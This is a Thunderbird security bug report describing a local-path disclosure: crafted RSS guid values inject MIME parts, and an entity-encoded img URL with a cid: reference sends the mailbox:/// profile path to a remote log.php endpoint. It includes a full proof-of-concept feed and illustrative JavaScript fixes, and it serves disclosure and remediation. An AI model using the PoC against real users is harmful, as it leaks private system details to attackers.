Bug 1411713 - TBE-01-013: RSS Local Path Leak via cid: Parsing Bug
Status: Closed, RESOLVED WORKSFORME (opened 7 years ago, closed 6 years ago)
Categories: MailNews Core :: MIME, defect
Tracking: Not tracked
People: Reporter: BenB, Unassigned
Details: Keywords: csectype-disclosure, privacy, sec-moderate; Whiteboard: [attack vectors closed?]
As described in TBE-01-011, it is possible to influence the MIME structure of the email that Thunderbird creates for an RSS feed item. This allows an attacker to embed attachments and reference them via the cid: URL scheme [4], which resolves a reference to an attachment by the attachment's Content-ID header.
Since the RSS feed is stored in the local file system, Thunderbird converts such a cid: reference into a mailbox:/// URL. This would normally not be a problem: JavaScript is not executed, so script cannot read the mailbox:/// URL (and with it the local profile path). However, Thunderbird suffers from the following parsing bug, which allows the mailbox:/// URL to be leaked to an attacker-controlled server.
[3] https://www.fxsitecompat.com/en-CA/docs/2015/moz-document-support-has-been-dropped/
[4] https://tools.ietf.org/html/rfc2392
Email Body:
<img src="http://examp&#x6C;e.com/log.php?

cid:aaaaab">
Decoded HTML Entity Payload:
http://example.com/log.php?
Parsed by Thunderbird:
<img src="http://example.com/log.php?
mailbox:///C:/Users/UserNAme/AppData/Roaming/Thunderbird/Profiles/anrhqp9r.pgp/Mail/Feeds/Feed1?number=1&part=1.1.3&filename=test.html">
Thunderbird will then try to fetch the specified image from the attacker's web server and, in doing so, sends the local file-system path of the RSS feed's mail store in the URL it requests. The following RSS feed demonstrates this behavior. The MIME structure is smuggled in through the item's guid element, from which Thunderbird builds the Message-Id header: the ">" and line break after myguid terminate that header, so the remainder of the guid is stored as further headers and body (see the stored message below). The injected HTML part references the injected SVG attachment, whose local path is then leaked to the attacker's web server.
PoC:
<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0" >
<channel>
<title>Feed1</title>
<link>aaa</link>
<item>
<title>Feed1</title>
<guid isPermaLink="false">myguid>
Content-Type: multipart/alternative; boundary="------------2DEE3F98D70BD2C65FBA7373"
MIME-Version: 1.0
Subject: feed1
From: test@example.com
To: test@example.com

This is a multi-part message in MIME format.
--------------2DEE3F98D70BD2C65FBA7373
Content-Type: multipart/related; boundary="------------A320A96F6639F3C578F35383"


--------------A320A96F6639F3C578F35383
Content-ID: myself
Content-Type: text/html
Content-Transfer-Encoding: 7Bit

<img src="http://192.1&#x36;8.0.12/log.php?

cid:aaaaab">
--------------A320A96F6639F3C578F35383
Content-ID: aaaaab
Content-Type: image/svg+xml
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="test.svg"

a

--------------A320A96F6639F3C578F35383--

--------------2DEE3F98D70BD2C65FBA7373--





</guid>
</item>
</channel>
</rss>
Resulting message as stored by Thunderbird in the feed's mailbox:
From - Thu, 28 Sep 2017 14:18:48 +0200
X-Mozilla-Status: 0041
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Received: by localhost; Thu, 28 Sep 2017 14:18:48 +0200
Date: Thu, 28 Sep 2017 14:18:48 +0200
Message-Id: <myguid>
Content-Type: multipart/alternative; boundary="------------2DEE3F98D70BD2C65FBA7373"
MIME-Version: 1.0
Subject: feed1
From: test@example.com
To: test@example.com

This is a multi-part message in MIME format.
--------------2DEE3F98D70BD2C65FBA7373
Content-Type: multipart/related; boundary="------------A320A96F6639F3C578F35383"

--------------A320A96F6639F3C578F35383
Content-ID: myself
Content-Type: text/html
Content-Transfer-Encoding: 7Bit

<img src="http://192.168.0.12/log.php?
cid:aaaaab">
--------------A320A96F6639F3C578F35383
Content-ID: aaaaab
Content-Type: image/svg+xml
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="test.svg"

a
--------------A320A96F6639F3C578F35383--
--------------2DEE3F98D70BD2C65FBA7373--@localhost.localdomain>
From: Feed1
MIME-Version: 1.0
Subject: Feed1
Content-Transfer-Encoding: 8bit
Content-Base:
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Feed1</title>
<base href="">
</head>
<body id="msgFeedSummaryBody" selected="false">
Feed1
</body>
</html>
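The stored message above shows the feed item's guid text landing inside the Message-Id header unescaped: the ">" and line break after myguid end that header, and the rest of the guid is stored as further headers and a body (this is the injection vector that comment 1 says bug 1411699 closes). The following is an added example, not Thunderbird's feed code: it models a builder that interpolates the guid verbatim next to one that validates it, and counts how many header lines a MIME parser would see in each case. Function names, the shortened sample guid and the fallback id are assumptions for illustration.

```javascript
// Added example, not Thunderbird's feed code: models how an untrusted feed
// <guid> ends up inside the generated Message-Id header, and the check that
// stops it. Function names and the fallback id are assumptions.

// Constructed sample, shortened from the PoC above: the ">" and the line
// break after "myguid" terminate the Message-Id header early; everything
// that follows is then parsed as further headers and as a body.
const INJECTED_GUID =
  "myguid>\r\nContent-Type: text/html\r\nMIME-Version: 1.0\r\n\r\n<img src=\"cid:aaaaab\">";

// Naive builder: interpolates the guid verbatim, which is what the stored
// message above shows ("<myguid>" ... "--@localhost.localdomain>").
function buildMessageIdNaive(guid, host) {
  return `Message-Id: <${guid}@${host}>`;
}

// Header lines a MIME parser would see before the first blank line.
function headerLines(headerBlock) {
  const head = headerBlock.split(/\r?\n\r?\n/)[0];
  return head.split(/\r?\n/).filter((l) => l.length > 0);
}

// Hardened builder: accept only a conservative dot-atom character set for the
// id-left part of a msg-id (RFC 5322, section 3.6.4). CR, LF, "<", ">",
// whitespace and "@" are all rejected; a rejected guid is replaced by a
// caller-supplied generated id instead of being repaired in place.
const MSG_ID_LEFT = /^[A-Za-z0-9!#$%&'*+\/=?^_`{|}~.-]{1,200}$/;

function buildMessageIdSafe(guid, host, fallbackId) {
  const id = MSG_ID_LEFT.test(guid) ? guid : fallbackId;
  return `Message-Id: <${id}@${host}>`;
}
```

Rejecting rather than stripping is deliberate: a guid that contains control characters is not a value worth preserving, and a generated id keeps the header well-formed without guessing what the author meant.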
It is recommended to review the parsing code for the cid: scheme and investigate why it does not detect the prepended, entity-encoded HTTP URL before rewriting the reference to a mailbox:/// URL.
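To make the recommended check concrete, here is an added example that is not Thunderbird's libmime code: a small model of the cid: rewrite step in a naive form that reproduces the leak shown in this bug (the cid: token is substituted wherever it occurs, so the http:// prefix survives and the mailbox:/// path ends up in the query string) and in a strict form that decodes entities, trims, and only rewrites a value that is entirely a cid: URL. Function names, the attachment table and the shortened mailbox:/// path are assumptions for illustration; the page itself leaves open why Thunderbird's real parser accepted the prefix, so the naive function is a model of the observed behavior, not of the actual code path.

```javascript
// Added example, not Thunderbird's libmime code: a model of the cid: rewrite
// step in two forms, a naive one that reproduces the leak shown in this bug and
// a strict one. Function names, the attachment table and the shortened
// mailbox:/// path are assumptions for illustration.

// Constructed attachment table: Content-ID -> local part URL, shaped like the
// mailbox:/// URL in the report (profile path shortened).
const ATTACHMENTS = {
  aaaaab: "mailbox:///C:/Users/UserNAme/.../Mail/Feeds/Feed1?number=1&part=1.1.3&filename=test.html",
};

// Constructed sample: the img src value from the report, with the
// entity-encoded "l" in "example" and the line break before the cid: reference.
const PAYLOAD_SRC = "http://examp&#x6C;e.com/log.php?\n\ncid:aaaaab";

// Minimal numeric-entity decoder (hex and decimal forms only; enough here).
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => String.fromCodePoint(parseInt(d, 10)));
}

// Naive rewrite: substitute the first "cid:<id>" token wherever it occurs in
// the value and keep whatever precedes it. On PAYLOAD_SRC this produces an
// http:// URL whose query string carries the mailbox:/// path, i.e. the leak.
function rewriteCidNaive(src, attachments) {
  return src.replace(/cid:([^\s"'<>]+)/, (m, id) =>
    Object.prototype.hasOwnProperty.call(attachments, id) ? attachments[id] : m);
}

// Strict rewrite: decode entities and trim first, then accept only a value
// that is, in its entirety, "cid:" plus a known Content-ID (RFC 2392 allows a
// percent-encoded addr-spec; this character set is deliberately narrower).
// Anything else is returned unchanged so the normal remote-content policy
// sees the original value.
function rewriteCidStrict(src, attachments) {
  const value = decodeEntities(src).trim();
  const m = /^cid:([A-Za-z0-9._%@+-]+)$/i.exec(value);
  if (!m) return src;
  const id = m[1];
  return Object.prototype.hasOwnProperty.call(attachments, id) ? attachments[id] : src;
}

// A rewritten value leaks if it is a remote URL that still carries a
// mailbox:/// path anywhere inside it.
function isRemoteUrl(u) {
  return /^https?:/i.test(decodeEntities(u).trim());
}
function leaksLocalPath(rewritten) {
  return isRemoteUrl(rewritten) && rewritten.includes("mailbox:///");
}
```

The strict form anchors the match at both ends of the decoded, trimmed value; that single change is what prevents a mailbox:/// URL from ever being spliced into a value that also contains a remote scheme.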
Updated 7 years ago
Group: mail-core-security

Comment 1, 7 years ago (Reporter)
For the original report as PDF; see bug 1411701.
Bug 1411699 will close the vector for injection of such a crafted eml via feed parsing. However, there are likely numerous ways to hand-craft MIME structures to break/leak in libmime. This bug belongs to that component imo.
Updated 7 years ago
Component: Feed Reader → MIME
Summary: RSS Local Path Leak via cid: Parsing Bug → TBE-01-013: RSS Local Path Leak via cid: Parsing Bug
Updated 6 years ago
Whiteboard: [attack vectors closed?]
Comment 3, 6 years ago
alta88, I'm wondering if there is anything specific left to do in this bug, or if it would be better to open new issues for any further attack vectors?
Flags: needinfo?(alta88)
I created a feed file with the PoC part above, adjusting for the wrapping there (it fails as invalid xml), adjusting for missing tags (that the parser fails it on), and a message was stored with a long messageId but no other content. So yes, a new vector needs to be found to exploit the cid, post Bug 1411699.
It would be good to ask Cure53 to recheck on the 68 ESR version.
Flags: needinfo?(alta88)
Updated 5 years ago
Group: mail-core-security